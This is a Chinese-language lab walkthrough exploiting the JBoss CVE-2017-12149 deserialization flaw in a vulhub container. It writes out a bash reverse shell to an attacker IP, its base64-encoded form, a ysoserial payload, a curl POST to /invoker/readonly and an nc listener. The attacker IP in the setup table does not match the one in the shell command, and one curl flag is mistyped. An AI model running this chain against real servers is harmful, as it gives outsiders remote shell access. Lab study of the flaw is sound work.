Jboss CVE-2017-12149反序列化漏洞

漏洞描述

该漏洞为 Java反序列化错误类型，存在于 Jboss 的 httpinvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。

实验环境

主机	角色	IP
centos8	漏洞靶机	192.168.1.80
windows10	攻击机	192.168.1.120

实验流程

启动漏洞环境centos8

service docker start
cd /usr/sbin/vulhub/jboss/CVE-2017-12149
docker-compose build
docker-compose up -d

尝试访问漏洞页面：

环境搭建成功！

bash -i >& /dev/tcp/192.168.1.125/8888 0>&1

编码后（在线编码）：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}

序列化数据生成：

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser

如图所示：成功生成poc.ser文件！

看一下文件内容，是生成的java代码：

在windows上开启一个端口监听：

用curl命令，将poc.ser以post请求的方式发送到/invoker/readonly。

curl http://192.168.1.80:8080/invoker/readonly --data--binary @poc.ser

如图所示，成功反弹shell：

nc -lvp 8888

使用自动化工具：工具地址

Jboss CVE-2017-12149反序列化漏洞

Jboss CVE-2017-12149反序列化漏洞

漏洞描述

实验环境

实验流程

相关文章